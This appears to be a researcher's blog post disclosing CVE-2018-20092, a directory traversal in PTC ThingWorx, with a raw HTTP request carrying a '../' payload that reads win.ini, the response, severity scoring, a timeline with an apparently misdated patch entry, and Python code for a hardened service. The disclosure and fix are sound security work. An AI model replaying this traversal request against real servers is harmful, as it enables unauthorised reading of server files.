
PTC ThingWorx Vulnerability (CVE-2018-20092)

We disclosed a PTC ThingWorx Vulnerability regarding a directory traversal last year, and I wanted to finally share the write-up.

PTC ThingWorx Vulnerability – Introduction

First of all, this is technically the first CVE that I contributed to, so that was pretty awesome. That said, Jared deserves AT LEAST 80% of the credit, if not more. I was just there to help, point him in directions, and write all this up.

PTC ThingWorx is “a complete, end-to-end technology platform designed for the industrial Internet of Things (IoT)”.

In this application, we found a fun directory traversal. It was also an interesting application to interact with in general.

Let me know what you think of the format of this post, as it is close to our internal disclosure document. It may be a bit verbose in places, but should also have all the information that anyone would need to reproduce or fix.

Directory Traversal (CVE-2018-20092)

Detailed vulnerability information

The ThingWorx application is vulnerable to a directory traversal attack. An attacker can utilize this vulnerability to read files that the application cannot normally read. In this case, the attacker can use the CreateZipArchive method to create and download zip files containing arbitrary files.

The following raw HTTP request demonstrates saving the C:\Windows\win.ini file to an archive called test.zip.

Raw Request – CreateZipArchive

POST /ThingWorx/Things/CCVTargetLimit_FileRepo/Services/CreateZipArchive HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <redacted>
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 78
Cookie: JSESSIONID=<redacted>
Connection: close

{"newFileName":"test.zip","path":"/","files":"../../../../../windows/win.ini"}

The following raw HTTP response indicates that the request was successful.

Raw Response – CreateZipArchive

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Security-Policy: frame-ancestors 'self'
X-Frame-Options: SAMEORIGIN
Expires: 0
Cache-Control: no-store, no-cache
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json;charset=UTF-8
Date: Tue, 01 May 2018 14:34:10 GMT
Connection: close
Content-Length: 157

{"dataShape":{"fieldDefinitions":{"result":{"name":"result","description":"result","baseType":"BOOLEAN","ordinal":0,"aspects":{}}}},"rows":[{"result":true}]}

Finally, you can find the contents of the downloaded win.ini below.

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Note that the zip file that the application returns discloses the full path of the requested files on the system (vs. the provided relative path). This information disclosure may be useful to attackers when attempting to exploit other types of vulnerabilities.
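As an added example (not code from this post or from PTC), the following Python shows what a CreateZipArchive-style service should do with the same three inputs: resolve each requested name against the file repository root, refuse anything that escapes it, and store repository-relative names in the archive so the zip does not leak the server's absolute paths. The repository layout and file names are constructed for the demo.

```python
import tempfile
import zipfile
from pathlib import Path


class TraversalError(ValueError):
    """Raised when a requested name would resolve outside the repository root."""


def resolve_in_repo(repo_root, path, files):
    """Map a (path, files) request onto files that must live inside repo_root.

    Returns (absolute_path, archive_name) pairs; archive_name is relative to the
    repository root, so the zip never records the server's filesystem layout.
    """
    root = Path(repo_root).resolve()
    pairs = []
    for name in (f.strip() for f in files.split(",") if f.strip()):
        # Both "path" and the name are repository-relative. resolve() collapses
        # ".." and follows symlinks against the real filesystem, so a request
        # such as "../../../../../windows/win.ini" lands outside the root.
        candidate = (root / path.strip("/") / name.lstrip("/")).resolve()
        if candidate != root and root not in candidate.parents:
            raise TraversalError(f"{name!r} escapes the repository root")
        pairs.append((candidate, candidate.relative_to(root).as_posix()))
    return pairs


def create_zip_archive(repo_root, new_file_name, path, files):
    """Hardened equivalent of the service: validate every name, including the output."""
    pairs = resolve_in_repo(repo_root, path, files)
    (out_abs, _), = resolve_in_repo(repo_root, path, new_file_name)
    with zipfile.ZipFile(out_abs, "w") as zf:
        for abs_path, arcname in pairs:
            zf.write(abs_path, arcname=arcname)
    return [arcname for _, arcname in pairs]


def demo():
    """Constructed sample repository: one legitimate file plus a traversal attempt."""
    with tempfile.TemporaryDirectory() as repo:
        (Path(repo) / "reports").mkdir()
        (Path(repo) / "reports" / "summary.txt").write_text("ok\n")
        accepted = create_zip_archive(repo, "test.zip", "/", "reports/summary.txt")
        try:
            create_zip_archive(repo, "test.zip", "/", "../../../../../windows/win.ini")
            rejected = False
        except TraversalError:
            rejected = True
        with zipfile.ZipFile(Path(repo) / "test.zip") as zf:
            names = zf.namelist()
    return {"accepted": accepted, "rejected": rejected, "archive_names": names}


if __name__ == "__main__":
    print(demo())
```

Because the containment check runs before anything is written, a rejected request leaves no partial archive behind.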

Justification of assigned severity

Severity: High

CVSSv3

7.7 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)

Damage

An attacker can utilize this vulnerability to download any file from the server hosting this application. Based on some research and testing, the user account running this service appears to have Administrative (SYSTEM) level access to the server.

Reproducibility

This attack is easily reproducible.

Exploitability

To exploit this vulnerability, attackers first need to know (or determine) the relative path of any file they wish to download. Because it is possible to automate the exploitation of this vulnerability, attackers can brute force the location of files with an unknown path.

Affected users

This vulnerability affects all files on the server.

Discoverability

This attack was discovered with manual browsing and reading the PTC API documentation.

Disclosure Timeline

The following is the (mostly accurate) timeline for this disclosure. I know it took a while for me to post this, but I wanted to make sure that Jared got his credit everywhere. Also, I wasn’t sure if Secureworks was going to post an advisory first or not.

2018-04-27 – Vulnerability discovered.
2018-06-29 – Disclosure completed and confirmed, reported to vendor.
2018-10-10 – CVE requested.
2019-12-13 – Vendor patch and disclosure released.
2019-04-10 – Disclosure updated to include Jared’s name.
2019-06-01 – This post published.

PTC ThingWorx Vulnerability – Conclusion

While it took a while, I did say that I wanted to work more on vulnerability disclosure.

Additionally, I found it interesting that users would call back-end Java methods in the same manner that you would use a REST API.

You can find the vendor’s disclosure here, and feel free to check out CVE-2018-20092.

I’ve hopefully got a few more disclosures, as well as CVEs, in the pipeline, so stay tuned!
